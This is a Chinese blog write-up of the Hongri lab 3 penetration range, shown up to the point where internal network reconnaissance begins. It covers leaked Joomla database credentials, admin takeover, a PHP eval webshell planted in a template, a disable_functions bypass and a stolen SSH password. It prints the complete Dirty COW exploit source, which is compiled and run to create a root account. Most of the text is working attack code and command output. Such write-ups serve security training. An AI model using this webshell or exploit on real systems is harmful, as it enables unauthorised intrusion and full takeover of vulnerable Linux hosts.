域渗透-红日靶场三


豪爽
对我来说,还是非常有挑战的一次域渗透的
很有价值
截至目前,第二长的一篇文章了

靶场说明

参考大佬博客
https://cloud.tencent.com/developer/article/2016323
https://cloud.tencent.com/developer/article/2016323
然后其他这个靶机有非常多的思路之类的,打法都不一样
比如,2026年暴露出来的linux提权,那肯定打老机器舒服多了,不一样要脏牛提权

红日靶场3考点介绍
flag在域控的C:\Users\Administrator\Documents\flag.txt

靶场整体结构
该靶场是一个典型的多层内网渗透场景,攻击链从外网 Web 入口开始,逐步横向到 Linux 跳板机、Windows 成员机,最后进入域控获取最终 flag。

第一层考点:外网 Web 信息泄露
外网入口是 Joomla 站点,存在敏感备份文件泄露,例如 configuration.php~,可以直接拿到数据库连接信息。

同时存在 phpinfo 页面,可用于确认 PHP 版本、系统版本和 disable_functions 状态。

第二层考点:Joomla 后台接管
攻击者可以通过数据库层面对 Joomla 用户进行控制,例如新增管理员或接管后台账号。

登录后台后,可以利用模板编辑功能修改模板文件,从而写入 WebShell。

第三层考点:WebShell 与命令执行
虽然目标存在 disable_functions 限制,但仍可通过绕过手段实现命令执行。

该层重点考察的是在受限 PHP 环境下构造稳定命令执行链路的能力。

第四层考点:主机取证与线索恢复
WebShell 只是起点,后续需要在主机上继续搜索历史文件、交换文件、配置文件和用户痕迹,从而发现 SSH 或内网凭据。

这部分考察的是落地后的信息搜集能力,而不是单纯拿壳即结束。

第五层考点:Linux 本地提权
获取到 SSH 低权限用户后,需要继续在 Linux 跳板机上提权。

靶场原始思路是利用低版本内核的 Dirty COW 漏洞实现 root 权限。

第六层考点:内网代理与横向移动
Linux 跳板机拥有双网卡,可连接外层网络和内层 192.168.93.0/24 网络,因此可以作为内网代理枢纽。

攻击者需要通过 socks、端口转发或其它转发方式,把自己的探测能力延伸到内网。

第七层考点:Windows 成员机入侵
内网成员机存在可利用的管理员口令,可通过 SMB、WMI、PsExec、RDP 等方式进入。

这一层重点是利用已有凭据完成系统接管,并为后续域控渗透做准备。

第八层考点:凭据抓取与域信息收集
进入 Windows 成员机后,可用 mimikatz 或 secretsdump 获取本地凭据、缓存域凭据、机器账户密钥和服务密钥。

同时可以识别域名、DNS 指向、域控地址等关键 AD 线索。

第九层考点:域控登录
获取域管理员凭据后,可以通过 WMI、SMB、RDP 等方式登录域控,最终读取 flag。

这一层考察的是凭据复用与域内最后一跳的执行能力。

核心考点总结
Joomla 信息泄露与后台接管
模板编辑写 WebShell
disable_functions 绕过
主机痕迹搜索与凭据恢复
Linux 内核提权
内网代理与横向移动
Windows 管理口令利用
mimikatz 与 secretsdump 凭据抓取
域控接管与最终 flag 获取
靶场特点
该靶场不是单点漏洞题,而是多阶段、多系统、多网段联动的综合内网渗透题,适合练习完整攻击链构建能力。

我们来跟着靶机,边打边补知识点

打法思路

首先就是配置VPN,然后目标地址
192.168.111.20
我们先来ping一下这个东西

1
2
3
4
5
6
7
8
9
10
11
12
C:\Users\31349>ping 192.168.111.20

正在 Ping 192.168.111.20 具有 32 字节的数据:
来自 192.168.111.20 的回复: 字节=32 时间=52ms TTL=63
来自 192.168.111.20 的回复: 字节=32 时间=53ms TTL=63
来自 192.168.111.20 的回复: 字节=32 时间=53ms TTL=63
来自 192.168.111.20 的回复: 字节=32 时间=52ms TTL=63

192.168.111.20 的 Ping 统计信息:
数据包: 已发送 = 4,已接收 = 4,丢失 = 0 (0% 丢失),
往返行程的估计时间(以毫秒为单位):
最短 = 52ms,最长 = 53ms,平均 = 52ms

然后本机地址
192.168.111.25
现在的情况就是,我们的这个openvpn信息可以看到,OPENVPN虚拟网卡的IP10.8.0.6,就是电脑和靶机OPENVPN服务器通信的隧道地址
上面这个可以输入ipconfig查看得知

1
2
3
4
5
未知适配器 本地连接:

连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::2422:473:2ece:9b98%3
IPv4 地址 . . . . . . . . . . . . : 10.8.0.6

然后靶机看到我们的地址就是192.168.111.25
然后不看这个IP地址正确性,大概的拓扑图如下

os:图片应该能加载出来吧

访问一下目的地址,使用Wappalyzer看一下CMS

发现使用的是joomla
这个时候我们就是说想要知道这个版本号是多少
kali使用命令

1
2
3
4
5
msfconsole
use auxiliary/scanner/http/joomla_version
set RHOSTS 192.168.111.20
set RPORT 80
run

结果返回

1
2
3
4
5
6
7
8
9
10
11
msf > use auxiliary/scanner/http/joomla_version
msf auxiliary(scanner/http/joomla_version) > set RHOSTS 192.168.111.20
RHOSTS => 192.168.111.20
msf auxiliary(scanner/http/joomla_version) > set RPORT 80
RPORT => 80
msf auxiliary(scanner/http/joomla_version) > run
[*] Server: nginx/1.9.4
[+] Joomla version: 3.9.12
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/joomla_version) >

扫出来:Joomla 3.9.12,Web 服务 nginx/1.9.4
知道版本号之后就可以在网上的各大漏洞库或者有什么漏洞扫描工具之类的,看看存不存在有可以利用的漏洞
扫一下目录

1
dirsearch -u http://192.168.111.20/

发现了robots.txt、网站的后台/administrator/和一个configuration.php~文件
dirsearch自指定路径,比如你觉得他这个字典不行,想要自己的这个字典
我们就搞一个这个

1
python dirsearch.py -u http://192.168.111.20/ -w "C:\Users\你的用户名\Desktop\joomla.txt"

访问这个http://192.168.111.20/administrator/
得到一个登陆框,这里就不考虑爆破这些工具手法了
访问http://192.168.111.20/configuration.php~
一定要记住后面那个符号
然后看这个的配置文件

1
2
3
4
5
6
7
8
9
10
11
12
<?php
class JConfig {
public $offline = '0';
public $offline_message = '缃戠珯姝e湪缁存姢銆�<br /> 璇风◢鍊欒闂€�';
public $display_offline_message = '1';
public $offline_image = '';
public $sitename = 'test';
public $editor = 'tinymce';
public $captcha = '0';
public $list_limit = '20';
public $access = '1';
......

得到数据库的这个账号密码

1
2
3
4
5
6
7
public $debug_lang_const = '1';
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'testuser';
public $password = 'cvcvgjASD!@';
public $db = 'joomla';
public $dbprefix = 'am2zu_';

这里可以看见连接成功了

然后在joomla库am2zu_users表中可以看到管理员账号密码

1
username:admin2,password:d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199

问GPT知道加密方式
然后可以叫GPT生成一个同一个加密方式的

1
2
admin
加密后的,放入数据库:433903e0a9d6a712e00251e44d29bf87:UJ0b9J5fufL3FKfCc0TLsYJBh2PFULvT

然后账号admin2,密码admin登陆进去
然后下一步就是靠经验来打了,不会的话就是积累一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
Templates: Styles (Site)
Main content begins here
Default Edit Duplicate Delete Options Help
×
Joomla! would like your permission to collect some basic statistics.
To better understand our install base and end user environments it is helpful if you send some site information back to a Joomla! controlled central server. No identifying data is captured at any point. You can change these settings later from Plugins > System - Joomla! Statistics. Select here to see the information that will be sent.

Enable Joomla Statistics?

Always Once Never

Styles
Templates
Search
Search
Search Tools Clear
Style Default Pages
No preview available. You can enable preview in the options.Beez3 - Default Not assigned
No preview available. You can enable preview in the options.protostar - Default

然后这里可以编辑或者创建,写入木马,1.php

1
2
<?php @eval($_POST['cmd']); phpinfo(); ?>

然后访问

1
http://192.168.111.20/templates/beez3/1.php

可以看到成功进入了

连接蚁剑

但是执行命令发现都失败了

看到disable_functions

1
disable_functions	exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source	exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source

对应地址右键,选择绕过函数功能,我这边截图太白了,就截图一部分了。我记得当时下载这个插件也挺麻烦的,主要是代理问题,但是要是真打PHP环境的话,肯定还是非常好用的

选择PHP7_UserFilter模式绕过
成功拿到shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

(www-data:ret=) $
(*) 基础信息
当前路径: /var/www/html/templates/beez3
磁盘列表: /
系统信息: Linux ubuntu 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64
当前用户: www-data
(*) 输入 ashelp 查看本地命令
(www-data:/var/www/html/templates/beez3) $ ls
1.php
component.php
css
error.php
favicon.ico
html
images
index.php
javascript
jsstrings.php
language
templateDetails.xml
template_preview.png
template_thumbnail.png
(www-data:/var/www/html/templates/beez3) $

查看本机内网IP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
(www-data:/var/www/html/templates/beez3) $ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:b1:40:d1 brd ff:ff:ff:ff:ff:ff
inet 192.168.93.120/24 brd 192.168.93.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:feb1:40d1/64 scope link
valid_lft forever preferred_lft forever
(www-data:/var/www/html/templates/beez3) $

192.168.93.120就是我们要的
主机信息

1
2
3
4
5
6
rever preferred_lft forever
inet6 fe80::250:56ff:feb1:40d1/64 scope link
valid_lft forever preferred_lft forever
(www-data:/var/www/html/templates/beez3) $ uname -a
Linux ubuntu 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
(www-data:/var/www/html/templates/beez3) $

/tmp/mysql/test.txt目录下有

1
2
adduser wwwuser
passwd wwwuser_123Aqx

可以看到是是系统 Linux 账号 wwwuser 的密码
我们去连接这台linux
我们回到本题,http://192.168.111.20/这里就是我们上传shell的地方
我们在蚁剑的时候看到的IP是192.168.93.120,内网 Ubuntu 机器(真实跑 Joomla),Nginx 把 http 请求转发给它,webshell 实际落地在这台
所以我们肯定连接不了那台内网机器,直接连接上外网的这台,然后通过外网的这台来继续渗透
不直接用ssh连接是因为旧版的ssh需要我们指定rsa连接方式

1
ssh -o HostKeyAlgorithms=+ssh-rsa wwwuser@192.168.111.20

信息搜集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
[wwwuser@localhost ~]$ uname -a
Linux localhost.localdomain 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
[wwwuser@localhost ~]$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 00:50:56:b1:dc:6f brd ff:ff:ff:ff:ff:ff
inet 192.168.111.20/24 scope global eth0
inet6 fe80::250:56ff:feb1:dc6f/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 00:50:56:b1:a2:a8 brd ff:ff:ff:ff:ff:ff
inet 192.168.93.100/24 scope global eth1
inet6 fe80::250:56ff:feb1:a2a8/64 scope link
valid_lft forever preferred_lft forever
[wwwuser@localhost ~]$

符合我们上面的推测,必须的先推测,不然你都不知道要连哪台
木马 (webshell) 流量走80 端口 HTTP 反向代理,可以穿透;SSH 是直接访问内网机器 22 端口,你的 Kali 没有到192.168.93.0/24的路由,所以连不到内网 Ubuntu
然后继续信息搜集

1
2
3
[wwwuser@localhost ~]$ cat /proc/version
Linux version 2.6.32-431.el6.x86_64 (mockbuild@c6b8.bsys.dev.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) ) #1 SMP Fri Nov 22 03:15:09 UTC 2013
[wwwuser@localhost ~]$

内核为2.6.32-431.el6,完全符合脏牛提权的条件,直接利用:
python2 -m SimpleHTTPServer 8000
开启简易 HTTP 文件服务,用来让跳板 CentOS 机器下载 exp(dcow 脏牛)
可以下,当然也可以直接编写EXP

1
2
vi dirty.c
开启编辑

然后输入源码

1
2
3
4
`i`粘贴全部代码,`Esc` → `:wq`
再运行
gcc -pthread dirty.c -o dcow -lcrypt
./dcow

拉取的做法

1
2
3
wget xxx.xxx
chmod +x dcow
./dcow

我选的是服务器下载源码到/var/www/html/dirty.c下面
然后编译下

1
2
cd /var/www/html
gcc -pthread dirty.c -o dirty -lcrypt

执行过程

1
2
3
4
root@iZtvt92ufty3mlZ:/var/www/html# cd /var/www/html
root@iZtvt92ufty3mlZ:/var/www/html#
root@iZtvt92ufty3mlZ:/var/www/html# gcc -pthread dirty.c -o dirty -lcrypt
root@iZtvt92ufty3mlZ:/var/www/html#

然后再看下文件是否存在,存在代表编译好了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@iZtvt92ufty3mlZ:/var/www/html# ls -l
总计 76
-rw-r--r-- 1 root root 171 11月 1 2025 1.dtd
-rw-r--r-- 1 root root 164 11月 2 2025 1.php
-rw-r--r-- 1 www-data www-data 596 10月 29 2025 cookie.php
-rw-r--r-- 1 www-data www-data 546 10月 29 2025 cookie.php.save
-rw-r----- 1 www-data www-data 1690 1月 21 2026 cookie.txt
-rwxr-xr-x 1 root root 17336 10月 5 20:52 dirty
-rwxr-xr-x 1 root root 4795 10月 5 20:49 dirty.c
-rw-r--r-- 1 root root 109 11月 1 2025 dtd.php
-rw-r--r-- 1 root root 10671 10月 29 2025 index.html
-rw-r--r-- 1 root root 615 10月 29 2025 index.nginx-debian.html
-rw-r--r-- 1 root root 52 11月 1 2025 ssrf.php
-rw-r--r-- 1 root root 151 11月 1 2025 test.dtd
root@iZtvt92ufty3mlZ:/var/www/html#

但是好像就是说那台机器好像都不能访问外网

1
2
3
[wwwuser@localhost ~]$ ping 8.8.8.8
connect: Network is unreachable
[wwwuser@localhost ~]$

得到确认
测试出不出网的问题

1
2
3
4
5
6
7
8
9
10
11
# 先看有没有默认路由
ip route

# 测公网 IP,排除 DNS 问题
ping -c 3 8.8.8.8

# 再测 DNS
ping -c 3 www.baidu.com

# 测 HTTP/HTTPS 出网
curl -I --connect-timeout 5 https://www.baidu.com

第一个结果是

1
2
3
4
5
[wwwuser@localhost ~]$ ip route
192.168.93.0/24 dev eth1 proto kernel scope link src 192.168.93.100
192.168.111.0/24 dev eth0 proto kernel scope link src 192.168.111.20
[wwwuser@localhost ~]$

现在整理下思路,192.168.93.120是蚁剑那台,192.168.111.20是我们ssh那台
我们用ssh那台来ping蚁剑那台,

1
2
3
4
5
ping 192.168.93.120
PING 192.168.93.120 (192.168.93.120) 56(84) bytes of data.
64 bytes from 192.168.93.120: icmp_seq=1 ttl=64 time=1.33 ms
64 bytes from 192.168.93.120: icmp_seq=2 ttl=64 time=0.200 ms

可以看到是通的。我们现在要提权的是SSH那台
两种思路,理论上
第一,ssh那台直接写脚本然后运行
第二,蚁剑那台写脚本,然后开个服务,ssh那台下载编译运行
我们试试第一个,然后主要就是说能实现这个,考虑到老版本,也许脚本会有改动,可以叫ai给你改下
github高star的脏牛提权脚本

https://github.com/firefart/dirtycow/blob/master/dirty.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
// The user will be prompted for the new password when the binary is run.
// The original /etc/passwd file is then backed up to /tmp/passwd.bak
// and overwrites the root account with the generated line.
// After running the exploit you should be able to login with the newly
// created user.
//
// To use this exploit modify the user values according to your needs.
// The default is "toor".
//
// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// Compile with:
// gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly create binary by either doing:
// "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su toor" or "ssh toor@..."
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
// mv /tmp/passwd.bak /etc/passwd
//
// Exploit adopted by Christian "firefart" Mehlmauer
// https://firefart.at
//

#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <stdlib.h>
#include <unistd.h>
#include <crypt.h>

const char *filename = "/etc/passwd";
const char *backup_filename = "/tmp/passwd.bak";
const char *salt = "toor";

int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;

struct Userinfo {
char *username;
char *hash;
int user_id;
int group_id;
char *info;
char *home_dir;
char *shell;
};

char *generate_password_hash(char *plaintext_pw) {
return crypt(plaintext_pw, salt);
}

char *generate_passwd_line(struct Userinfo u) {
const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
int size = snprintf(NULL, 0, format, u.username, u.hash,
u.user_id, u.group_id, u.info, u.home_dir, u.shell);
char *ret = malloc(size + 1);
sprintf(ret, format, u.username, u.hash, u.user_id,
u.group_id, u.info, u.home_dir, u.shell);
return ret;
}

void *madviseThread(void *arg) {
int i, c = 0;
for(i = 0; i < 200000000; i++) {
c += madvise(map, 100, MADV_DONTNEED);
}
printf("madvise %d\n\n", c);
}

int copy_file(const char *from, const char *to) {
// check if target file already exists
if(access(to, F_OK) != -1) {
printf("File %s already exists! Please delete it and run again\n",
to);
return -1;
}

char ch;
FILE *source, *target;

source = fopen(from, "r");
if(source == NULL) {
return -1;
}
target = fopen(to, "w");
if(target == NULL) {
fclose(source);
return -1;
}

while((ch = fgetc(source)) != EOF) {
fputc(ch, target);
}

printf("%s successfully backed up to %s\n",
from, to);

fclose(source);
fclose(target);

return 0;
}

int main(int argc, char *argv[])
{
// backup file
int ret = copy_file(filename, backup_filename);
if (ret != 0) {
exit(ret);
}

struct Userinfo user;
// set values, change as needed
user.username = "toor";
user.user_id = 0;
user.group_id = 0;
user.info = "pwned";
user.home_dir = "/root";
user.shell = "/bin/bash";

char *plaintext_pw;

if (argc >= 2) {
plaintext_pw = argv[1];
printf("Please enter the new password: %s\n", plaintext_pw);
} else {
plaintext_pw = getpass("Please enter the new password: ");
}

user.hash = generate_password_hash(plaintext_pw);
char *complete_passwd_line = generate_passwd_line(user);
printf("Complete line:\n%s\n", complete_passwd_line);

f = open(filename, O_RDONLY);
fstat(f, &st);
map = mmap(NULL,
st.st_size + sizeof(long),
PROT_READ,
MAP_PRIVATE,
f,
0);
printf("mmap: %lx\n",(unsigned long)map);
pid = fork();
if(pid) {
waitpid(pid, NULL, 0);
int u, i, o, c = 0;
int l=strlen(complete_passwd_line);
for(i = 0; i < 10000/l; i++) {
for(o = 0; o < l; o++) {
for(u = 0; u < 10000; u++) {
c += ptrace(PTRACE_POKETEXT,
pid,
map + o,
*((long*)(complete_passwd_line + o)));
}
}
}
printf("ptrace %d\n",c);
}
else {
pthread_create(&pth,
NULL,
madviseThread,
NULL);
ptrace(PTRACE_TRACEME);
kill(getpid(), SIGSTOP);
pthread_join(pth,NULL);
}

printf("Done! Check %s to see if the new user was created.\n", filename);
printf("You can log in with the username '%s' and the password '%s'.\n\n",
user.username, plaintext_pw);
printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",
backup_filename, filename);
return 0;
}

进入tmp目录
然后vi写入再编译运行

1
2
gcc -pthread dirty.c -o dirty -lcrypt && chmod 777 dirty && ./dirty 123456

然后有问题问AI,然后千万别信豆包这个SB给的.c脚本,就用我的github下载的,然后有问题问下AI(但是还是不要让它给你改脚本用它的)。或者你给更牛逼的AI
我是脱产在学校,搞不起GPT的cyber。妈的,这个SB豆包浪费老子两个小时
我信它的脚本,而不信自己在GITHUB上的脚本,还得我弄了半天,我成功的前一刻,它还在告诉我错误的答案

可以看到

1
2
3
[toor@localhost tmp]# id
uid=0(toor) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[toor@localhost tmp]#

可以看到是root权限了
!!!千万注意,一定是可以脏牛提权的,提权失败不是靶机的问题,一定是你的问题
因为我怀疑是靶机问题还是源码下载过来了,白白浪费了很多时间
最后再骂一下,SB豆包
ip a
ip route
arp -n

  • ip a:看有没有第二块网卡,确认内网网卡 IP 192.168.93.100
  • ip route:看内核路由表,确认存在 192.168.93.0/24 网段路由
  • arp -n:看当前 arp 缓存,已经通信过的内网主机立刻展示,不用扫
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    183
    184
    185
    186
    187
    188
    189
    190
    191
    192
    193
    194
    195
    196
    197
    198
    199
    200
    201
    202
    203
    204
    205
    206
    207
    208
    209
    210
    211
    212
    213
    214
    215
    216
    217
    218
    219
    220
    221
    222
    223
    224
    225
    226
    227
    228
    229
    230
    231
    232
    233
    234
    235
    236
    237
    238
    239
    240
    241
    242
    243
    244
    245
    246
    247
    248
    249
    250
    251
    252
    253
    254
    255
    256
    257
    258
    259
    260
    261
    262
    263
    264
    265
    266
    267
    268
    269
    270
    271
    272
    273
    274
    275
    276
    277
    278
    [toor@localhost tmp]# ip a
    1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
    valid_lft forever preferred_lft forever
    2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:50:56:b1:dc:6f brd ff:ff:ff:ff:ff:ff
    inet 192.168.111.20/24 scope global eth0
    inet6 fe80::250:56ff:feb1:dc6f/64 scope link
    valid_lft forever preferred_lft forever
    3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:50:56:b1:a2:a8 brd ff:ff:ff:ff:ff:ff
    inet 192.168.93.100/24 scope global eth1
    inet6 fe80::250:56ff:feb1:a2a8/64 scope link
    valid_lft forever preferred_lft forever
    [toor@localhost tmp]# ip route
    192.168.93.0/24 dev eth1 proto kernel scope link src 192.168.93.100
    192.168.111.0/24 dev eth0 proto kernel scope link src 192.168.111.20
    [toor@localhost tmp]# arp -n
    Address HWtype HWaddress Flags Mask Iface
    192.168.93.250 (incomplete) eth1
    192.168.93.19 (incomplete) eth1
    192.168.93.171 (incomplete) eth1
    192.168.93.57 (incomplete) eth1
    192.168.93.42 (incomplete) eth1
    192.168.93.99 (incomplete) eth1
    192.168.93.90 (incomplete) eth1
    192.168.93.244 (incomplete) eth1
    192.168.93.133 (incomplete) eth1
    192.168.93.215 (incomplete) eth1
    192.168.93.212 (incomplete) eth1
    192.168.93.162 (incomplete) eth1
    192.168.93.35 (incomplete) eth1
    192.168.93.113 (incomplete) eth1
    192.168.93.60 (incomplete) eth1
    192.168.93.39 (incomplete) eth1
    192.168.93.74 (incomplete) eth1
    192.168.93.175 (incomplete) eth1
    192.168.93.52 (incomplete) eth1
    192.168.93.152 (incomplete) eth1
    192.168.93.194 (incomplete) eth1
    192.168.93.172 (incomplete) eth1
    192.168.93.174 (incomplete) eth1
    192.168.93.180 (incomplete) eth1
    192.168.93.195 (incomplete) eth1
    192.168.93.141 (incomplete) eth1
    192.168.93.91 (incomplete) eth1
    192.168.93.103 (incomplete) eth1
    192.168.93.89 (incomplete) eth1
    192.168.93.68 (incomplete) eth1
    192.168.93.159 (incomplete) eth1
    192.168.93.49 (incomplete) eth1
    192.168.93.121 (incomplete) eth1
    192.168.93.247 (incomplete) eth1
    192.168.93.203 (incomplete) eth1
    192.168.93.253 (incomplete) eth1
    192.168.93.87 (incomplete) eth1
    192.168.93.130 (incomplete) eth1
    192.168.93.143 (incomplete) eth1
    192.168.93.95 (incomplete) eth1
    192.168.93.92 (incomplete) eth1
    192.168.93.248 (incomplete) eth1
    192.168.93.7 (incomplete) eth1
    192.168.93.53 (incomplete) eth1
    192.168.93.251 (incomplete) eth1
    192.168.93.107 (incomplete) eth1
    192.168.93.202 (incomplete) eth1
    192.168.93.129 (incomplete) eth1
    192.168.93.201 (incomplete) eth1
    192.168.93.120 ether 00:50:56:b1:40:d1 C eth1
    192.168.93.117 (incomplete) eth1
    192.168.93.1 (incomplete) eth1
    192.168.93.223 (incomplete) eth1
    192.168.93.18 (incomplete) eth1
    192.168.93.254 (incomplete) eth1
    192.168.93.61 (incomplete) eth1
    192.168.93.33 (incomplete) eth1
    192.168.93.58 (incomplete) eth1
    192.168.93.150 (incomplete) eth1
    192.168.93.230 (incomplete) eth1
    192.168.93.157 (incomplete) eth1
    192.168.93.24 (incomplete) eth1
    192.168.93.187 (incomplete) eth1
    192.168.93.218 (incomplete) eth1
    192.168.93.188 (incomplete) eth1
    192.168.93.45 (incomplete) eth1
    192.168.93.184 (incomplete) eth1
    192.168.93.13 (incomplete) eth1
    192.168.93.178 (incomplete) eth1
    192.168.93.79 (incomplete) eth1
    192.168.93.142 (incomplete) eth1
    192.168.93.50 (incomplete) eth1
    192.168.93.235 (incomplete) eth1
    192.168.93.81 (incomplete) eth1
    192.168.93.237 (incomplete) eth1
    192.168.93.38 (incomplete) eth1
    192.168.93.96 (incomplete) eth1
    192.168.93.54 (incomplete) eth1
    192.168.93.239 (incomplete) eth1
    192.168.93.31 (incomplete) eth1
    192.168.93.44 (incomplete) eth1
    192.168.93.109 (incomplete) eth1
    192.168.93.88 (incomplete) eth1
    192.168.93.26 (incomplete) eth1
    192.168.93.128 (incomplete) eth1
    192.168.93.234 (incomplete) eth1
    192.168.93.186 (incomplete) eth1
    192.168.93.101 (incomplete) eth1
    192.168.93.6 (incomplete) eth1
    192.168.93.209 (incomplete) eth1
    192.168.93.165 (incomplete) eth1
    192.168.93.11 (incomplete) eth1
    192.168.93.196 (incomplete) eth1
    192.168.93.191 (incomplete) eth1
    192.168.93.85 (incomplete) eth1
    192.168.93.214 (incomplete) eth1
    192.168.93.211 (incomplete) eth1
    192.168.93.185 (incomplete) eth1
    192.168.93.125 (incomplete) eth1
    192.168.93.132 (incomplete) eth1
    192.168.93.8 (incomplete) eth1
    192.168.93.62 (incomplete) eth1
    192.168.93.10 ether 00:50:56:b1:83:3a C eth1
    192.168.93.232 (incomplete) eth1
    192.168.93.22 (incomplete) eth1
    192.168.93.176 (incomplete) eth1
    192.168.111.25 ether 00:50:56:b1:66:7e C eth0
    192.168.93.75 (incomplete) eth1
    192.168.93.82 (incomplete) eth1
    192.168.93.70 (incomplete) eth1
    192.168.93.15 (incomplete) eth1
    192.168.93.41 (incomplete) eth1
    192.168.93.9 (incomplete) eth1
    192.168.93.241 (incomplete) eth1
    192.168.93.4 (incomplete) eth1
    192.168.93.221 (incomplete) eth1
    192.168.93.220 (incomplete) eth1
    192.168.93.98 (incomplete) eth1
    192.168.93.112 (incomplete) eth1
    192.168.93.104 (incomplete) eth1
    192.168.93.183 (incomplete) eth1
    192.168.93.118 (incomplete) eth1
    192.168.93.27 (incomplete) eth1
    192.168.93.210 (incomplete) eth1
    192.168.93.154 (incomplete) eth1
    192.168.93.110 (incomplete) eth1
    192.168.93.208 (incomplete) eth1
    192.168.93.40 (incomplete) eth1
    192.168.93.97 (incomplete) eth1
    192.168.93.72 (incomplete) eth1
    192.168.93.29 (incomplete) eth1
    192.168.93.217 (incomplete) eth1
    192.168.93.166 (incomplete) eth1
    192.168.93.64 (incomplete) eth1
    192.168.93.145 (incomplete) eth1
    192.168.93.216 (incomplete) eth1
    192.168.93.77 (incomplete) eth1
    192.168.93.73 (incomplete) eth1
    192.168.93.93 (incomplete) eth1
    192.168.93.229 (incomplete) eth1
    192.168.93.205 (incomplete) eth1
    192.168.93.119 (incomplete) eth1
    192.168.93.36 (incomplete) eth1
    192.168.93.204 (incomplete) eth1
